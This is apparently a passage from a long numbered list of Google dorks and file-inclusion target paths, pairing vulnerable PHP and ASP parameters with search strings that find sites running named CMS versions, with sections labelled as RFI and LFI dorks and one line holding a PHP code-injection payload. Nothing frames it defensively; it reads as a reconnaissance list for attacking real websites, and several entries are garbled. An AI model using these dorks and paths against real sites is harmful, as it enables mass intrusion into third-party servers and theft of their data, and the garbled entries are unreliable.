  5603. /index.php?slang= .php?slang=
  5604. /index.php?slang= ".php?slang="
  5605. index.php?sort= .php?sort="
  5606. index.php?spage= index.php?spage="
  5607. index.php?spage= index.php?spage=
  5608. index.php?spage= .php?spage=
  5609. index.php?spage= .php?spage="
  5610. index.php?ss= index.php?ss="
  5611. index.php?ss= .php?ss="
  5612. index.php?st= index.php?st="
  5613. index.php?sub= index.php?sub="
  5614. index.php?sub= index.php?sub=
  5615. index.php?sub= .php?sub=
  5616. index.php?sub= "index.php?sub="
  5617. index.php?sub= "index.php?sub=""
  5618. index.php?sub= ".php?sub="
  5619. index.php?subpage= index.php?subpage="
  5620. index.php?subpage= .php?subpage="
  5621. index.php?subp= index.php?subp="
  5622. index.php?subp= .php?subp="
  5623. index.php?table= index.php?table=
  5624. index.php?table= .php?table=
  5625. index.php?t= index.php?t="
  5626. index.php?task= index.php?task=
  5627. index.php?task= .php?task=
  5628. index.php?term= .php?term="
  5629. index.php?textfield= .php?textfield="
  5630. index.php?theme= index.php?theme=
  5631. index.php?theme= .php?theme=
  5632. index.php?trans= index.php?trans="
  5633. index.php?trans= .php?trans="
  5634. index.php?v= index.php?v="
  5635. index.php?ver= index.php?ver="
  5636. index.php?ver= index.php?ver=
  5637. index.php?ver= .php?ver="
  5638. index.php?ver= .php?ver=
  5639. /index.php?vis= /index.php?vis=
  5640. /index.php?vis= .php?vis=
  5641. index.php?way= index.php?way=
  5642. index.php?way= .php?way=
  5643. index.php?wpage= index.php?wpage="
  5644. index.php?wpage= .php?wpage="
  5645. info.php?ln= info.php?ln="
  5646. info.php?ln= info.php?ln=
  5647. info.php?ln= .php?ln="
  5648. /interna.php?meio= .php?meio="
  5649. kalender.php?vis= kalender.php"
  5650. kalender.php?vis= kalender.php?vis="
  5651. kalender.php?vis= .php?vis="
  5652. lang.php?arg= .php?arg=
  5653. lang.php?arq= .php?arq=
  5654. lang.php?lk= .php?lk="
  5655. lang.php?ln= .php?ln=
  5656. lang.php?subpage= .php?subpage="
  5657. lang.php?subp= .php?sub="
  5658. lang.php?subp= .php?subp="
  5659. /lib/db/ez_sql.php?lib_path= ttCMS
  5660. /lib/db/ez_sql.php?lib_path= ttCMS <= v4
  5661. /lib/static/header.php?set_menu= iPhoto Album
  5662. /lib/static/header.php?set_menu= iPhotoAlbum
  5663. /lib/static/header.php?set_menu= iPhotoAlbum v1.1
  5664. link.php?do= .php?do="
  5665. list.php?product= .php?product=
  5666. list.php?table= .php?table=
  5667. ln.php?ln= .php?ln=
  5668. loc.php?l= .php?l="
  5669. loc.php?l= .php?loc="
  5670. loc.php?lang= .php?lang="
  5671. loc.php?lang= .php?loc="
  5672. loc.php?loc= loc.php?loc="
  5673. loc.php?loc= .php?loc="
  5674. login.php?loca= .php?loca=
  5675. magazine.php?inc= .php?inc="
  5676. main1.php?arg= .php?arg=
  5677. main1.php?ln= .php?ln=
  5678. main2.php?ln= .php?ln=
  5679. main.html.php?seite= .php?seite=
  5680. main.php3?act= main.php3?act="
  5681. main.php3?act= .php3?act="
  5682. main.php5?page= .php5?id=
  5683. main.php?a= .php?a="
  5684. main.php?arg= .php?arg=
  5685. main.php?ba= main.php?ba="
  5686. main.php?ba= .php?ba="
  5687. main.php?command= main.php?command="
  5688. main.php?command= .php?command="
  5689. main.php?d1= main.php?d1="
  5690. main.php?d1= .php?d1="
  5691. main.php?f1= .php?f1="
  5692. main.php?fset= .php?fset="
  5693. main.php?inc= .php?inc="
  5694. main.php?ln= .php?ln=
  5695. main.php?ltr= .php?ltr="
  5696. main.php?s= main.php?s="
  5697. main.php?s= main.php?s=
  5698. main.php?s= .php?s=
  5699. main.php?s= .php?s="
  5700. main.php?sit= .php?sit="
  5701. main.php?table= .php?table=
  5702. main.php?vis= main.php?vis="
  5703. main.php?vis= main.php?vis=
  5704. main.php?vis= .php?vis="
  5705. mai.php?act= mai.php?act="
  5706. mai.php?act= mai.php?act=
  5707. mai.php?loc= mai.php?loc="
  5708. mai.php?loc= mai.php?loc=
  5709. mai.php?src= mai.php?src="
  5710. mai.php?src= mai.php?src=
  5711. map.php?loc= map.php?loc=
  5712. middle.php?file= "middle.php?file="
  5713. middle.php?file= "middle.php?page="
  5714. middle.php?file= ".php?file="
  5715. middle.php?file= ".php?page="
  5716. middle.php?file= middle.php?file=
  5717. middle.php?file= middle.php?page=
  5718. middle.php?file= .php?file=
  5719. middle.php?file= .php?page=
  5720. middle.php?page= "middle.php?page="
  5721. middle.php?page= ".php?page="
  5722. middle.php?page= middle.php?page=
  5723. middle.php?page= .php?page=
  5724. misc.php?do= .php?do="
  5725. mod.php?mod= mod.php?mod="
  5726. mod.php?mod= .php?mod="
  5727. module.php?mod= module.php?mod="
  5728. module.php?mod= .php?mod="
  5729. /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook"
  5730. /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook"
  5731. /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= "PostGuestbook 0.6.1"
  5732. /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook
  5733. /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= PostGuestbook 0.6.1
  5734. modul.php?mod= modul.php?mod="
  5735. modul.php?mod= .php?mod="
  5736. more.php?sub= "more.php?sub="
  5737. more.php?sub= more.php?sub=
  5738. nav.php?g= "nav.php?g="
  5739. nav.php?g= nav.php?g=
  5740. nav.php?go= "nav.php?go="
  5741. nav.php?go= nav.php?go=
  5742. nav.php?lk= .php?lk="
  5743. nav.php?ln= .php?ln=
  5744. nav.php?loc= nav.php
  5745. nav.php?loc= nav.php?loc=
  5746. nav.php?loc= .php?loc=
  5747. nav.php?nav= "nav.php?nav="
  5748. nav.php?nav= nav.php?nav=
  5749. nav.php?page= "nav.php?page="
  5750. nav.php?page= nav.php?page=
  5751. nav.php?pagina= "nav.php?pagina="
  5752. nav.php?pagina= nav.php?pagina=
  5753. nav.php?pag= "nav.php?pag="
  5754. nav.php?pag= nav.php?pag=
  5755. nav.php?pg= "nav.php?pg="
  5756. nav.php?pg= nav.php?pg=
  5757. nav.php?p= "nav.php?p="
  5758. nav.php?p= nav.php?p=
  5759. order.php?lang= order.php?lang=
  5760. order.php?list= order.php?list=
  5761. order.php?ln= order.php?ln=
  5762. order.php?l= order.php?l=
  5763. order.php?page= order.php?page=
  5764. order.php?pag= order.php?pag=
  5765. order.php?pg= order.php?pg=
  5766. order.php?p= order.php?p=
  5767. order.php?wp= order.php?wp=
  5768. order.php?wp= .php?wp=
  5769. /?page= .php5?id=
  5770. page.php5?id= page.php5?id=
  5771. page.php5?id= .php5?id=
  5772. page.php?arq= .php?arq=
  5773. page.php?ln= .php?ln=
  5774. page.php?p= page.php?p="
  5775. page.php?p= page.php?p=
  5776. page.php?p= .php?p=
  5777. page.php?p= .php?p="
  5778. page.php?s= page.php?s="
  5779. page.php?s= page.php?s=
  5780. page.php?s= .php?s=
  5781. page.php?s= .php?s="
  5782. /?pag= .php5?id=
  5783. /palportal/index.php?page= /palportal/
  5784. /palportal/index.php?page= pal portal
  5785. /?pg= .php5?id=
  5786. /?p= .php5?id=
  5787. p.php?p= .php?p=
  5788. p.php?p= .php?p="
  5789. p.php?p= p.php?p="
  5790. p.php?p= "p.php?p="
  5791. p.php?p= p.php?p=
  5792. presse.php?do= .php?do="
  5793. presse.php?do= presse.php?do="
  5794. print.php?pager= .php?pager=
  5795. print.php?pager= print.php?pager=
  5796. print.php?table= .php?table=
  5797. proddetail.php?prod= .php?prod="
  5798. prod.php?prod= .php?prod="
  5799. products.php?prod= .php?prod="
  5800. produit.php?prod= .php?prod="
  5801. produkt.php?prod= .php?prod="
  5802. /read.php?fpage= /read.php?fpage=
  5803. reports.php?sub= "reports.php?sub="
  5804. reports.php?sub= reports.php?sub=
  5805. rss.php?phpraid_dir= phpraid"
  5806. rss.php?phpraid_dir= phpraid
  5807. rss.php?phpraid_dir= ""$2-"
  5808. rss.php?phpraid_dir= "php raid"
  5809. rss.php?phpraid_dir= php raid
  5810. s1.php?ln= .php?ln=
  5811. search.php?exec= search.php?exec=
  5812. shop.php?prod= .php?prod="
  5813. shop.pl/page= shop.pl/page=
  5814. show.php?page1= .php?page1="
  5815. show.php?product= .php?product=
  5816. show.php?product= show.php?product=
  5817. side.php?arq= .php?arq=
  5818. side.php?table= .php?table=
  5819. side.php?vis= .php?vis=
  5820. side.php?vis= side.php?vis=
  5821. site.php?arq= .php?arq=
  5822. site.php?meio= .php?meio=
  5823. site.php?table= .php?table=
  5824. s.php?table= .php?table=
  5825. start.php?id= .php?id="
  5826. start.php?id= start.php?id="
  5827. start.php?id= start.php?id=
  5828. start.php?lang= .php?lang="
  5829. start.php?lang= start.php?lang="
  5830. start.php?lang= start.php?lang=
  5831. start.php?lang= .php?lang=
  5832. start.php?mod= .php?mod="
  5833. start.php?mod= start.php?mod="
  5834. start.php?page= .php?page="
  5835. start.php?page= start.php?page="
  5836. start.php?page= start.php?page=
  5837. start.php?pag= start.php?pag=
  5838. start.php?pg= start.php?pg=
  5839. start.php?p= start.php?p=
  5840. start.php?s= .php?s="
  5841. start.php?s= start.php?s="
  5842. start.php?s= start.php?s=
  5843. str.php?lang= str.php?lang=
  5844. str.php?ln= str.php?ln=
  5845. str.php?l= str.php?l=
  5846. str.php?page= str.php?page=
  5847. str.php?p= str.php?p=
  5848. sub.php?menu= "sub.php?menu="
  5849. sub.php?menu= sub.php?menu=
  5850. sub.php?s= "sub.php?s="
  5851. sub.php?s= sub.php?s=
  5852. sub.php?sub= "sub.php?sub="
  5853. sub.php?sub= sub.php?sub=
  5854. task.php?task= .php?task=
  5855. task.php?task= task.php?task=
  5856. /templates/mangobery/footer.sample.php?Site_Path= Mangobery
  5857. /templates/mangobery/footer.sample.php?Site_Path= Mangobery 0.5.5
  5858. /templates/mangobery/footer.sample.php?Site_Path= Mangobery-0.5.5
  5859. trans.php?trans= .php?trans="
  5860. trans.php?trans= trans.php?trans="
  5861. /trans/trans.php?trans=eng&page= .php?trans="
  5862. /trans/trans.php?trans=en&page= .php?trans="
  5863. /trans/trans.php?trans=fr&page= .php?trans="
  5864. /trans/trans.php?trans=ko&page= .php?trans="
  5865. /trans/trans.php?trans=&page= .php?trans="
  5866. /trans/trans.php?trans=&p= .php?trans="
  5867. view.php?sub= "view.php?sub="
  5868. view.php?sub= view.php?sub=
  5869. view.php?table= .php?table=
  5870. voir.php?inc= .php?inc="
  5871. werbungFrame.php?do= .php?do="
  5872. /ws/get_events.php?includedir= Web Calendar
  5873. /ws/get_events.php?includedir= WebCalendar
  5874. /ws/get_events.php?includedir= WebCalendar v0.9.45
  5875. /ws/get_reminders.php?includedir= WebCalendar
  5876. /ws/get_reminders.php?includedir= WebCalendar v0.9.45
  5877. /ws/login.php?includedir= WebCalendar
  5878. /ws/login.php?includedir= WebCalendar v0.9.45
  5879. ocp-103/index.php?req_path= ocPortal
  5880. images/evil.php?owned= e107
  5881. /modules/My_eGery/public/displayCategory.php?basepath=
  5882. /_functions.php?prefix=
  5883. /main.php?x=
  5884. /index.php?inc=
  5885. /inc/pipe.php?HCL_path=
  5886. /help/faq/inc/pipe.php?HCL_path=
  5887. /helpcenter/inc/pipe.php?HCL_path=
  5888. /forum/inst.php?phpbb_root_dir=
  5889. /inc/authform.inc.php?path_pre=
  5890. index.php?sec=
  5891. index.php?filename=
  5892. index.php?dir=
  5893. index.php?document=
  5894. index.php?view=
  5895. *.php?sel=
  5896. *.php?session=&content=
  5897. *.php?locate=
  5898. *.php?place=
  5899. *.php?layout=
  5900. *.php?go=
  5901. *.php?catch=
  5902. *.php?mode=
  5903. *.php?name=
  5904. *.php?loc=
  5905. *.php?f=
  5906. *.php?inf=
  5907. *.php?pg=
  5908. *.php?load=
  5909. *.php?naam=
  5910. /index.php?page= site:*.dk
  5911. /index.php?file= site:*.dk
  5912. INURL OR INURL WITH:
  5913. /includes/header.php?systempath=
  5914. /Gery/displayCategory.php?basepath=
  5915. /mylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  5916. /mylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
  5917. /modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=
  5918. /modules/xgery/upgrade_album.php?GERY_BASEDIR=
  5919. /side/index.php?side=
  5920. /index.php?main=
  5921. /index2.php?menu=
  5922. /index1.php?link=
  5923. /index.php?babInstPath=
  5924. /main.php?body=
  5925. /main.php?view=
  5926. 1. my_egery site:.org
  5927. 2. xgery site:.org
  5928. 3. coppermine site:.org
  5929. 4. 4nAlbum site:.org
  5930. 5. inurlP:NphpBB2 site:.org
  5931. 6. ihm.php?p=
  5932. 7. Keyword : "powered by MyLinks"
  5933. 8. /modules.php?name=myguests
  5934. /modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  5935. 9. /Popper/index.php?
  5936. 10. google = kietu/hit_js.php, kietu/hit_js.php
  5937. yahoo = by Kietu? v 3.2
  5938. /kietu/index.php?kietu[url_hit]=
  5939. /html&highlight=%2527.include($_GET[a]),exit.%2527&a=
  5940. 12. keyword : "powered by CubeCart 3.0.6"
  5941. 14. powered by AshNews", AshNews atau /ashnews.php
  5942. 16. ihm.php?p=*
  5943. diganti dengan :
  5944. 15. .php?bodyfile=
  5945. 16. /includes/orderSuccess.inc.php?glob=
  5946. 17. forums.html
  5947. 18. /default.php?page=home
  5948. 19. /folder.php?id=
  5949. 20. main.php?pagina=
  5950. /paginedinamiche/main.php?pagina=
  5951. 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( *.edu.*/modules.php?name=myguests ) or ( "powered by MyGuests")
  5952. 22. application.php?base_path=
  5953. 23. inurlp:hplivehelper
  5954. 24. inurlp:hpnuke
  5955. /archive.php?CONFIG[script_path]=
  5956. 26. keyword: "powered by smartblog" AND ?page=login
  5957. 27. /forum/
  5958. 28. keyword:"Powered By FusionPHP"
  5959. 29. shoutbox/expanded.php filetypep:hp
  5960. 30. /osticket/
  5961. 32. "static.php?load="
  5962. 34. keyworld: /phpGedview/login.php site:
  5963. 35. /folder.php?id=
  5964. "/lire.php?rub="
  5965. "/os/pointer.php?url="
  5966. "folder.php?id="
  5967. "show.php?page="
  5968. "index2.php?DoAction="
  5969. "index.php?canal="
  5970. "index.php?screen="
  5971. "index.php?langc="
  5972. "index.php?Language="
  5973. "view.php?page="
  5974. dork: "powered by doodle cart"
  5975. rfi of this dork: enc/content.php?Home_Path=
  5976. rfi of this dork: /includes/dbal.php?eqdkp_root_path=
  5977. "template.php?goto="
  5978. "video.php?content="
  5979. "pages.php?page="
  5980. "index1.php?choix="
  5981. "index1.php?menu="
  5982. "index2.php?ascii_seite="
  5983. dork: surveys
  5984. rfi to this dork: /surveys/survey.inc.php?path=
  5985. "index.php?body="
  5986. dork: adobt sitel
  5987. "kb_constants.php?module_root_path="
  5988. dork: mcf.php"
  5989. rfi to this dork: /mcf.php?content=
  5990. dork: "main.php?sayfa="
  5991. dork: "powered by phpCOIN 1.2.3"
  5992. rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
  5993. "index.php?go="
  5994. "index1.php?="
  5995. "lib/gore.php?libpath="
  5996. "index2.php?p="
  5997. /administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=
  5998. /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
  5999. index1.php?=
  6000. main.php?id=
  6001. index.php?sel=
  6002. page.php?doc=
  6003. components/com_geria/geria.html.php?mosConfig_absolute_path=
  6004. index.php?meio=
  6005. index.php?inc=
  6006. index.php?arquivo=
  6007. index.php?inhalt=
  6008. index.php?canal=
  6009. media.php?page=
  6010. inc/cmses/aedating4CMS.php?dir[inc]= flashchat site:br bp_ncom.php?bnrep=
  6011. /components/com_facileforms/facileforms.frame.php?ff_compath=
  6012. /components/com_zoom/includes/database.php?mosConfig_absolute_path=
  6013. /header.php?abspath=
  6014. index2.php?p=
  6015. administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /tools/send_reminders.php?includedir= day.php?date=
  6016. administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGery/index.php?basepath=
  6017. .br/index.php?loc=
  6018. includes/functions.php?phpbb_root_path=
  6019. index.php?template=
  6020. modules/My_eGery/index.php?basepath=
  6021. /squirrelcart/cart_content.php?cart_isp_root=
  6022. index.php?openfile=
  6023. contenido.php?sec=
  6024. noticias.php?arq=
  6025. index.php?langc=
  6026. h.php?file=
  6027. h.php?page=
  6028. index1.php?x=
  6029. /photoalb/lib/static/header.php?set_menu=
  6030. /extensions/moblog/moblog_lib.php?basedir=
  6031. modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]=
  6032. /components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=
  6033. view.php?adresa=
  6034. pagina.php?type=
  6035. gery.php?seite=
  6036. gery.php?strona=
  6037. nota.php?header=
  6038. view.php?var=
  6039. include.php?*
  6040. padrao.php?ir=
  6041. *inc*.php?left=
  6042. gery.php?eval=
  6043. index1.php?op=
  6044. enter.php?pagina=
  6045. head.php?*
  6046. view.php?*
  6047. view.php?second=
  6048. home.php?pr=
  6049. view.php?incl=
  6050. principal.php?viewpage=
  6051. index2.php?choix=
  6052. page.php?goto=
  6053. *.php?secc=
  6054. index3.php?chapter=
  6055. padrao.php?secc=
  6056. general.php?id=
  6057. standard.php?pref=
  6058. template.php?play=
  6059. gery.php?ref=
  6060. view.php?phpbb_root_path=
  6061. start.php?where=
  6062. down*.php?filepath=
  6063. principal.php?filepath=
  6064. view.php?option=
  6065. show.php?*root*=
  6066. general.php?tipo=
  6067. gery.php?oldal=
  6068. path.php?path=
  6069. *inc*.php?category=
  6070. default.php?pag=
  6071. default.php?to=
  6072. main.php?str=
  6073. path.php?in=
  6074. base.php?ev=
  6075. principal.php?choix=
  6076. include.php?name=
  6077. index1.php?*
  6078. view.php?disp=
  6079. gery.php?url=
  6080. mod*.php?section=
  6081. general.php?name=
  6082. gery.php?xlink=
  6083. mod*.php?to=
  6084. enter.php?sp=
  6085. enter.php?loader=
  6086. mod*.php?goFile=
  6087. *inc*.php?type=
  6088. sitio.php?qry=
  6089. press.php?*
  6090. mod*.php?ev=
  6091. default.php?cmd=
  6092. layout.php?modo=
  6093. index3.php?type=
  6094. base.php?cont=
  6095. nota.php?itemnav=
  6096. include.php?option=
  6097. gery.php?*
  6098. pagina.php?link=
  6099. gery.php?addr=
  6100. standard.php?eval=
  6101. info.php?subject=
  6102. start.php?showpage=
  6103. info.php?ref=
  6104. pagina.php?id=
  6105. head.php?str=
  6106. print.php?header=
  6107. blank.php?j=
  6108. gery.php?base_dir=
  6109. sitio.php?*root*=
  6110. mod*.php?pag=
  6111. index2.php?ref=
  6112. pagina.php?load=
  6113. blank.php?basepath=
  6114. file.php?y=
  6115. nota.php?t=
  6116. info.php?var=
  6117. start.php?panel=
  6118. sitio.php?inc=
  6119. info.php?header=
  6120. sitio.php?modo=
  6121. start.php?load=
  6122. padrao.php?*root*=
  6123. index3.php?get=
  6124. include.php?secao=
  6125. head.php?pag=
  6126. path.php?xlink=
  6127. *inc*.php?doshow=
  6128. default.php?chapter=
  6129. index.php?chapter=
  6130. default.php?choix=
  6131. nota.php?module=
  6132. enter.php?lang=
  6133. view.php?recipe=
  6134. base.php?subject=
  6135. sub*.php?my=
  6136. layout.php?link=
  6137. standard.php?qry=
  6138. index3.php?pollname=
  6139. standard.php?include=
  6140. press.php?opcion=
  6141. gery.php?tipo=
  6142. pagina.php?secao=
  6143. gery.php?loader=
  6144. path.php?var=
  6145. enter.php?pa=
  6146. include.php?mid=
  6147. index2.php?corpo=
  6148. info.php?recipe=
  6149. principal.php?cont=
  6150. info.php?f=
  6151. gery.php?basepath=
  6152. sub*.php?id=
  6153. standard.php?chapter=
  6154. default.php?e=
  6155. sub*.php?itemnav=
  6156. down*.php?incl=
  6157. start.php?ir=
  6158. info.php?ki=
  6159. index.php?mid=
  6160. pagina.php?middlePart=
  6161. print.php?doshow=
  6162. page.php?seite=
  6163. blank.php?pname=
  6164. press.php?to=
  6165. index2.php?strona=
  6166. template.php?e=
  6167. enter.php?left=
  6168. gery.php?ev=
  6169. file.php?id=
  6170. page.php?OpenPage=
  6171. gery.php?option=
  6172. head.php?viewpage=
  6173. page.php?cont=
  6174. index2.php?pg=
  6175. layout.php?thispage=
  6176. sitio.php?option=
  6177. index2.php?category=
  6178. index1.php?t=
  6179. layout.php?tipo=
  6180. enter.php?b=
  6181. standard.php?z=
  6182. sitio.php?middlePart=
  6183. sub*.php?link=
  6184. base.php?base_dir=
  6185. index2.php?loc=
  6186. nota.php?option=
  6187. info.php?content=
  6188. start.php?include=
  6189. base.php?numero=
  6190. mod*.php?lang=
  6191. show.php?j=
  6192. mod*.php?secc=
  6193. mod*.php?pg=
  6194. layout.php?cmd=
  6195. info.php?phpbb_root_path=
  6196. enter.php?sec=
  6197. path.php?*
  6198. start.php?body=
  6199. include.php?x=
  6200. gery.php?rub=
  6201. sub*.php?basepath=
  6202. enter.php?abre=
  6203. gery.php?chapter=
  6204. standard.php?*
  6205. start.php?nivel=
  6206. home.php?pollname=
  6207. include.php?channel=
  6208. padrao.php?menu=
  6209. page.php?go=
  6210. gery.php?left=
  6211. down*.php?qry=
  6212. base.php?ir=
  6213. gery.php?sec=
  6214. info.php?rub=
  6215. main.php?index=
  6216. view.php?loader=
  6217. info.php?adresa=
  6218. gery.php?nivel=
  6219. info.php?sec=
  6220. base.php?*
  6221. file.php?showpage=
  6222. enter.php?home=
  6223. info.php?menue=
  6224. index.php?middlePart=
  6225. blank.php?corpo=
  6226. page.php?*
  6227. press.php?ir=
  6228. layout.php?where=
  6229. info.php?o=
  6230. template.php?menue=
  6231. press.php?abre=
  6232. home.php?play=
  6233. pagina.php?q=
  6234. default.php?loc=
  6235. print.php?middlePart=
  6236. sitio.php?secc=
  6237. head.php?start=
  6238. gery.php?h=
  6239. pagina.php?mid=
  6240. enter.php?qry=
  6241. padrao.php?filepath=
  6242. base.php?chapter=
  6243. template.php?*
  6244. gery.php?action=
  6245. index3.php?body=
  6246. general.php?f=
  6247. padrao.php?pag=
  6248. *inc*.php?rub=
  6249. print.php?link=
  6250. gery.php?pname=
  6251. show.php?pname=
  6252. file.php?q=
  6253. gery.php?sivu=
  6254. base.php?abre=
  6255. index3.php?addr=
  6256. *inc*.php?get=
  6257. index.php?str=
  6258. head.php?b=
  6259. home.php?cmd=
  6260. standard.php?xlink=
  6261. info.php?home=
  6262. principal.php?ki=
  6263. sub*.php?panel=
  6264. path.php?sec=
  6265. default.php?header=
  6266. sub*.php?z=
  6267. print.php?goFile=
  6268. include.php?second=
  6269. gery.php?pref=
  6270. head.php?strona=
  6271. sitio.php?read=
  6272. print.php?*root*=
  6273. principal.php?nivel=
  6274. index.php?base_dir=
  6275. mod*.php?home=
  6276. general.php?doshow=
  6277. enter.php?seite=
  6278. down*.php?lang=
  6279. gery.php?redirect=
  6280. index.php?adresa=
  6281. main.php?mod=
  6282. index2.php?u=
  6283. padrao.php?*
  6284. view.php?lang=
  6285. mod*.php?seccion=
  6286. view.php?middle=
  6287. print.php?sekce=
  6288. head.php?ref=
  6289. principal.php?link=
  6290. gery.php?menue=
  6291. nota.php?pagina=
  6292. include.php?filepath=
  6293. principal.php?l=
  6294. layout.php?oldal=
  6295. include.php?b=
  6296. info.php?*
  6297. sub*.php?*
  6298. * *=
  6299. press.php?module=
  6300. general.php?get=
  6301. press.php?path=
  6302. layout.php?section=
  6303. mod*.php?destino=
  6304. base.php?doshow=
  6305. gery.php?open=
  6306. index3.php?itemnav=
  6307. gery.php?mod=
  6308. enter.php?ref=
  6309. file.php?var=
  6310. sitio.php?ir=
  6311. print.php?opcion=
  6312. info.php?ir=
  6313. home.php?basepath=
  6314. include.php?to=
  6315. start.php?sp=
  6316. index1.php?sekce=
  6317. gery.php?my=
  6318. index3.php?destino=
  6319. template.php?t=
  6320. base.php?mid=
  6321. start.php?b=
  6322. default.php?rub=
  6323. press.php?get=
  6324. principal.php?secc=
  6325. gery.php?menu=
  6326. gery.php?corpo=
  6327. gery.php?filepath=
  6328. file.php?ref=
  6329. index1.php?seite=
  6330. padrao.php?c=
  6331. enter.php?itemnav=
  6332. template.php?content=
  6333. mod*.php?content=
  6334. nota.php?link=
  6335. page.php?adresa=
  6336. inc/cmses/aedatingCMS.php?dir[inc]=
  6337. modules/vwar/admin/admin.php?vwar_root=
  6338. index.php?pagename=
  6339. smarty_config.php?root_dir=
  6340. components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=
  6341. components/com_cpg/cpg.php?mosConfig_absolute_path=
  6342. m2f/m2f_phpbb204.php?m2f_root_path=
  6343. "add_cart.asp?num="
  6344. "addToCart.asp?idProduct="
  6345. "ancillary.asp?ID="
  6346. "browse.asp?catid="
  6347. "browse_item_details.asp"
  6348. "Browse_Item_Details.asp?Store_Id="
  6349. "cardinfo.asp?card="
  6350. "checkout.asp?UserID="
  6351. "checkout_confirmed.asp?order_id="
  6352. "checkout1.asp?cartid="
  6353. "comersus_listCategoriesAndProducts.asp?idCategory ="
  6354. "comersus_optReviewReadExec.asp?idProduct="
  6355. "comersus_viewItem.asp?idProduct="
  6356. "comments_form.asp?ID="
  6357. "contact.asp?cartId="
  6358. "content.asp?id="
  6359. "description.asp?bookid="
  6360. "details.asp?Press_Release_ID="
  6361. "display_item.asp?id="
  6362. "faq_list.asp?id="
  6363. "faqs.asp?id="
  6364. "giftDetail.asp?id="
  6365. "index.asp?cartID="
  6366. "item.asp?eid="
  6367. "item.asp?model="
  6368. "item_details.asp?catid="
  6369. "itemdetails.asp?catalogid="
  6370. "list.asp?bookid="
  6371. "order.asp?id="
  6372. "order.asp?item_ID="
  6373. "payment.asp?CartID="
  6374. "pdetail.asp?item_id="
  6375. "prodlist.asp?catid="
  6376. "productDetails.asp?idProduct="
  6377. "productinfo.asp?item="
  6378. "productlist.asp?ViewType=Category&CategoryID= "
  6379. "results.asp?cat="
  6380. "savecart.asp?CartId="
  6381. "search.asp?CartID="
  6382. "shop.asp?bookid="
  6383. "shopbycategory.asp?catid="
  6384. "shopcurrency.asp?cid="
  6385. "shopdisplaycategories.asp"
  6386. "shopexd.asp"
  6387. "ShopSearch.asp?CategoryID="
  6388. "showStore.asp?catID="
  6389. "store.asp?id="
  6390. "store_listing.asp?id="
  6391. "storefront.asp?id="
  6392. "storefronts.asp?title="
  6393. "tek9.asp?"
  6394. "type.asp?iType="
  6395. "updatebasket.asp?bookid="
  6396. "view_cart.asp?title="
  6397. "WsAncillary.asp?ID"
  6398. –lfi dorks-
  6399. default.php?page= inurl:”default.php?page=”
  6400. folder.php?id= inurl:”folder.php?id=”
  6401. hall.php?page= inurl:”hall.php?page=”
  6402. show.php?page= inurl:”show.php?page=”
  6403. view.php?page= inurl:”view.php?page=”
  6404. media.php?page= inurl:”media.php?page=”
  6405. index1.php?choix= inurl:”index1.php?choix=”
  6406. index1.php?menu= inurl:”index1.php?menu”
  6407. index.php?ort= inurl:”index.php?ort=”
  6408. index2.php?showpage= inurl:”index2.php?showpage=”
  6409. index2.php?ascii_seite= inurl:”index2.php?ascii_seite=”
  6410. index2.php?DoAction= inurl:”index2.php?DoAction=”
  6411. index.php?canal= inurl:”index.php?canal=”
  6412. index.php?screen= inurl:”index.php?screen=”
  6413. index.php?langc= inurl:”index.php?langc=”
  6414. services.php?page= inurl:”services.php?page=”
  6415. htmltonuke.php?filnavn= inurl:”htmltonuke.php?filnavn=”
  6416. ihm.php?p= inurl:”ihm.php?p=”
  6417. index.php?Load= inurl:”index.php?Load=”
  6418. index.php?Language= inurl:”index.php?Language=”
  6419. hall.php?file= inurl:”hall.php?file=”
  6420. template.php?goto= inurl:”template.php?goto=”
  6421. video.php?content= inurl:”video.php?content=”
  6422. pages.php?page= inurl:”pages.php?page=”
  6423. print.php?page= inurl:”print.php?page=”
  6424. index.php?body= inurl:”index.php?body=”
  6425. /classes/adodbt/sql.php?classes_dir= allinurl:adobt sitel
  6426. enc/content.php?Home_Path= “powered by doodle cart”
  6427. /sources/functions.php?CONFIG[main_path]= “(Powered By ScozNews)”
  6428. /sources/template.php?CONFIG[main_path]= “(Powered By ScozNews)”
  6429. /embed/day.php?path= intitle:”Login to Calendar”
  6430. /includes/dbal.php?eqdkp_root_path= “powered by EQdkp”
  6431. /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]= “Powered By Aardvark Topsites PHP 4.2.2?
  6432. /includes/kb_constants.php?module_root_path= “Powered by Knowledge Base”
  6433. /mcf.php?content= allinurl:”mcf.php” site:.de
  6434. /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:”com_facileforms” site:.ar
  6435. skins/advanced/advanced1.php?pluginpath[0]= “Sabdrimer CMS”
  6436. /zipndownload.php?PP_PATH= “Powered by: PhotoPost PHP 4.6?
  6437. /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:”com_serverstat”
  6438. /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:”index.php?option=”com_zoom”
  6439. /main.php?sayfa= inurl:”main.php?sayfa=”
  6440. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath= allinurl:com_extended_registration
  6441. /addpost_newpoll.php?addpoll=preview&thispath= allinurl:”/ubbthreads/”
  6442. /header.php?abspath= “MobilePublisherPHP”
  6443. components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
  6444. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:index.php?option=com_remository
  6445. impex/ImpExData.php?systempath= intextowered by vbulletin
